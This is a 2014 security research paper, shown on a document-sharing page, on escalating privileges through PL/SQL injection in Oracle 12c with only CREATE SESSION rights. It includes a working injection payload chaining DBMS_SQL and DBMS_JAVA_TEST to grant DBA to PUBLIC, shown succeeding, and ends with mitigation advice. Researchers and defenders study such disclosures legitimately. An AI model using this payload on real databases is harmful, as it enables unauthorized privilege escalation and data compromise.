Exploiting PL/SQL Injection on Oracle 12c. with only. CREATE SESSION privileges



Similar documents
Hacking and Protecting Oracle DB. Slavik Markovich CTO, Sentrigo

Paul M. Wright Last updated Sunday 25 th February For

Oracle PL/SQL Injection

Advanced SQL Injection in Oracle databases. Esteban Martínez Fayó

NEW AND IMPROVED: HACKING ORACLE FROM WEB. Sumit sid Siddharth 7Safe Limited UK

Oracle Data Redaction is Broken

ODTUG - SQL Injection Crash Course for Oracle Developers

Best Practices for Oracle Databases Hardening Oracle /

A Forensic Investigation of PL/SQL Injection Attacks in Oracle 1 st July 2010 David Litchfield

Pentesting / Hacking Oracle databases with

PLOUG Oracle Security. Alexander Kornbrust, Jacek Sapiński 16-Oct-2008 OPITZ CONSULTING. Red-Database-Security GmbH

AUTOMATIC DETECTION OF VULNERABILITY IN WRAPPED PACKAGES IN ORACLE

The Sins of SQL Programming that send the DB to Upgrade Purgatory Abel Macias. 1 Copyright 2011, Oracle and/or its affiliates. All rights reserved.

SQL injection: Not only AND 1=1. The OWASP Foundation. Bernardo Damele A. G. Penetration Tester Portcullis Computer Security Ltd

An Introduction to SQL Injection Attacks for Oracle Developers. January 2004 INTEGRIGY. Mission Critical Applications Mission Critical Security

Database Programming with PL/SQL: Learning Objectives

Oracle For Beginners Page : 1

SQL Injection in web applications

WHITE PAPER. An Introduction to SQL Injection Attacks for Oracle Developers

Penetration Testing: Advanced Oracle Exploitation Page 1

Oracle Database 10g: Program with PL/SQL

Hedgehog: Host-Based Database Activity Monitoring & Prevention

Best Practices for Dynamic SQL

Oracle Database: Program with PL/SQL

Database security tutorial. Part I

White Paper. McAfee Real-Time Database Monitoring, Auditing, and Intrusion Prevention

Topics Advanced PL/SQL, Integration with PROIV SuperLayer and use within Glovia

Oracle Database: Program with PL/SQL

Oracle Database: Program with PL/SQL

Oracle 11g PL/SQL training

Oracle Database 11g: Program with PL/SQL

Security Vulnerability Notice

Advanced SQL Injection

Violating The Corporate Database. Presented by Dan Cornforth Brightstar, IT Security Summit, April 2006

Creating PL/SQL Blocks. Copyright 2007, Oracle. All rights reserved.

HUNTING ASYNCHRONOUS VULNERABILITIES. James Kettle

D61830GC30. MySQL for Developers. Summary. Introduction. Prerequisites. At Course completion After completing this course, students will be able to:

SQL SERVER Anti-Forensics. Cesar Cerrudo

An Oracle White Paper June Migrating Applications and Databases with Oracle Database 12c

Manipulating Microsoft SQL Server Using SQL Injection

Oracle Database: Program with PL/SQL

Top 10 Database. Misconfigurations.

Fine Grained Auditing In Oracle 10G

Oracle(PL/SQL) Training

An Oracle White Paper March Integrating Oracle Database Vault with Oracle Application Express

White Paper. Blindfolded SQL Injection

Developing SQL and PL/SQL with JDeveloper

Performance Implications of Various Cursor Types in Microsoft SQL Server. By: Edward Whalen Performance Tuning Corporation

Oracle Database 10g: Introduction to SQL

An Introduction to PL/SQL. Mehdi Azarmi

How I hacked PacketStorm ( )

SQL Programming. CS145 Lecture Notes #10. Motivation. Oracle PL/SQL. Basics. Example schema:

Advanced PostgreSQL SQL Injection and Filter Bypass Techniques

Persistent Stored Modules (Stored Procedures) : PSM

Hunting flaws in Microsoft SQL Server

Review your answers, feedback, and question scores below. An asterisk (*) indicates a correct answer.

Oracle PL/SQL Programming

Security Considerations for the Spiral Development Model

Webapps Vulnerability Report

SQL Injection January 23, 2013

SQL Injection and Data Mining through Inference

Building Server-Side XML Schema Validation

Different ways to guess Oracle database SID

Oracle Database: Program with PL/SQL

Handling Exceptions. Copyright 2006, Oracle. All rights reserved. Oracle Database 10g: PL/SQL Fundamentals 8-1

Oracle Security Auditing

Oracle Security Auditing

1 Triggers. 2 PL/SQL Triggers

SQL Injection 2.0: Bigger, Badder, Faster and More Dangerous Than Ever. Dana Tamir, Product Marketing Manager, Imperva

Introduction to Oracle PL/SQL Programming V2.1 - Lessons 11-End

Modern PL/SQL Code Checking and Dependency Analysis

PROCEDURES, FUNCTIONS AND PACKAGES

Real Life Database Security Mistakes. Stephen Kost Integrigy Corporation Session #715

CHAPTER 5 INTELLIGENT TECHNIQUES TO PREVENT SQL INJECTION ATTACKS

Oracle Database: SQL and PL/SQL Fundamentals

Need for Database Security. Whitepaper

Cabot Consulting Oracle Solutions. The Benefits of this Approach. Infrastructure Requirements

Automatic Data Optimization

Microsoft SQL Server for Oracle DBAs Course 40045; 4 Days, Instructor-led

Oracle Database 10g Express

Oracle Database: Develop PL/SQL Program Units

CPNI TECHNICAL NOTE. Disclaimer

Migrating Non-Oracle Databases and their Applications to Oracle Database 12c O R A C L E W H I T E P A P E R D E C E M B E R

A basic create statement for a simple student table would look like the following.

Oracle Insurance Policy Administration

Setting up SQL Translation Framework OBE for Database 12cR1

Oracle 11gR2 : Recover dropped tablespace using RMAN tablespace point in time recovery

Using RMAN to restore a database to another server in an ASM environment

Automating SQL Injection Exploits

Token Sequencing Approach to Prevent SQL Injection Attacks

STUDY OF PL/SQL BLOCK AIM: To Study about PL/SQL block.

IBM InfoSphere Guardium for DB2 on z/os Technical Deep Dive

Maintaining Stored Procedures in Database Application

Writing Control Structures

Oracle Database: SQL and PL/SQL Fundamentals NEW

INTRUSION PROTECTION AGAINST SQL INJECTION ATTACKS USING REVERSE PROXY

ASL IT Security Advanced Web Exploitation Kung Fu V2.0

Transcription:

Exploiting PL/SQL Injection on Oracle 12c with only CREATE SESSION privileges David Litchfield [david.litchfield@datacom.com.au] 21 st May 2014 Copyright Datacom TSS http://www.datacomtss.com.au

Introduction The ability to execute arbitrary SQL on Oracle is limited by the fact that Oracle, unlike Microsoft SQL Server, will not execute batch queries. It s not possible, for example, to tack on a GRANT DBA TO PUBLIC to the end of a SELECT statement. In order to execute truly arbitrary SQL, an attacker needs to insert an auxiliary inject function [1] into the statement. This function effectively executes the attacker s SQL. If an attacker has the CREATE PROCEDURE privilege then they can create their own auxiliary inject function and use this but if the user only has the CREATE SESSION privilege, the bare minimum needed to connect to the database server, then they need to find an extant function. On previous versions of Oracle there were a number of functions that could be used for this task and are discussed in [2][3] and [4]. Up until recently it was possible to use the DBMS_XMLQUERY.NEWCONTEXT function [5]: EXEC SYS.VULNERABLE_PROC('FOO'' DBMS_XMLQUERY.NEWCONTEXT(''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''GRANT DBA TO PUBLIC''''; END;'') ''BAR'); However, in Oracle 12c this no longer works (As a side note, it no longer works in recently patched versions of 11gR2 either). Indeed all the functions previously known to work as auxiliary inject functions have been fixed. As such a new method is required to execute arbitrary SQL on Oracle 12c. Before we begin, let s consider our vulnerable procedure; its source code is below. SQL> CONNECT / AS SYSDBA Connected. SQL> CREATE OR REPLACE PROCEDURE VULNERABLE_PROC (P VARCHAR) IS 2 N NUMBER; 3 BEGIN 4 EXECUTE IMMEDIATE 'SELECT COUNT(*) FROM ALL_OBJECTS WHERE OBJECT_NAME = ''' P '''' INTO N; 5 DBMS_OUTPUT.PUT_LINE(N); 6 END; 7 / Procedure created. SQL> GRANT EXECUTE ON VULNERABLE_PROC TO PUBLIC; Grant succeeded.

SQL> SET SERVEROUTPUT ON SQL> EXEC VULNERABLE_PROC('ALL_OBJECTS'); 2 PL/SQL procedure successfully completed. SQL> EXEC VULNERABLE_PROC('FOO''BAR'); BEGIN VULNERABLE_PROC('FOO''BAR'); END; * ERROR at line 1: ORA-00933: SQL command not properly ended ORA-06512: at "SYS.VULNERABLE_PROC", line 4 ORA-06512: at line 1 As we can see the procedure called VULNERABLE_PROC is vulnerable to SQL injection. Without the ability to create a procedure, find an auxiliary inject function or devise a new method of attack this would be unexploitable. Achieving arbitrary SQL execution Building on the author s previous work [2][4] and using DBMS_SQL and DBMS_JAVA_TEST, it is possible to chain multiple function calls together to achieve the execution of arbitrary SQL. It is a somewhat convoluted attack, but before explaining it, here it is: SQL> connect c##david/password Connected. SQL> set role dba; set role dba * ERROR at line 1: ORA-01924: role 'DBA' not granted or does not exist SQL> exec sys.vulnerable_proc('aa'' dbms_java_test.funcall(''-setprop'', '' '', ''user.language'',dbms_sql.open_cursor) dbms_java_test.funcall(''-set_output_to_sql'', '' '', ''dbout'', 1, ''call

dbms_sql.parse(to_number(dbms_java_test.funcall(''''-getprop'''', '''' '''', ''''user.language'''')), ''''declare pragma autonomous_transaction; begin execute immediate ''''''''grant dba to public''''''''; dbms_output.put_line(user'''' :1 ''''); end;'''',2)'', ''TEXT'', null, null, null, null, 0, 7) dbms_java_test.funcall(''-runjava'','' '', ''oracle.aurora.util.test'','''','''') dbms_sql.execute(dbms_java_test.funcall(''-getprop'', '' '', ''user.language'')) ''AA'); PL/SQL procedure successfully completed. SQL> set role dba; Role set. Here s what s happening the colour coding should help distinguish separate steps of the attack 1. Open a cursor using DBMS_SQL.OPEN_CURSOR 2. Store the cursor for later use using DBMS_JAVA_TEST with setprop parameter. We use the user.language property as PUBLIC has the privileges to set it. If we used another property an access denied is thrown if the vulnerable procedure is not owned by a DBA. 3. Use DBMS_JAVA_TEST.FUNCALL with SET_OUTPUT_TO_SQL to set up the SQL wrapper. The wrapper will retrieve the cursor by calling DBMS_JAVA_TEST with the getprop parameter and pass it to the DBMS_SQL.PARSE procedure and parse the SQL payload 4. Trigger java output by calling DBMS_JAVA_TEST with runjava parameter. This causes the server to execute the wrapper SQL. This sets up the payload ready for execution. (The Java must not cause an exception otherwise execution will stop) 5. Retrieve the cursor again by calling DBMS_JAVA_TEST with getprop and pass it to DBMS_SQL.EXECUTE. 6. Call DBMS_SQL.EXECUTE and pass it the cursor. This will execute the payload SQL. The same technique can be used to exploit SQL injection flaws in web based applications. Indeed, this method was developed during a recent penetration test on an Oracle 12c environment and the old attacks failed to work. This led to the birth of this monstrosity. Preventing abuse By revoking the execute permission on DBMS_JAVA_TEST from PUBLIC this will help prevent its abuse. The same must be done for the DBMS_JAVA package because it internally calls DBMS_JAVA_TEST and thus acts as a wrapper. Revoking public execute permissions on

DBMS_SQL is not advisable as it could affect core functionality of the database server. If Java is not actively being used by the database s applications it should be removed. This prevents this attack and also addresses many more security issues by reducing attack surface. References [1] http://www.davidlitchfield.com/plsql-injection-create-session.pdf [2] http://www.davidlitchfield.com/cursor-injection.pdf [3] http://www.davidlitchfield.com/exploitingplsqlinoracle11g.pdf [4] http://www.davidlitchfield.com/hackingaurora.pdf [5] https://www.corelan.be/index.php/2012/03/15/blackhat-eu-2012-day-2/

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information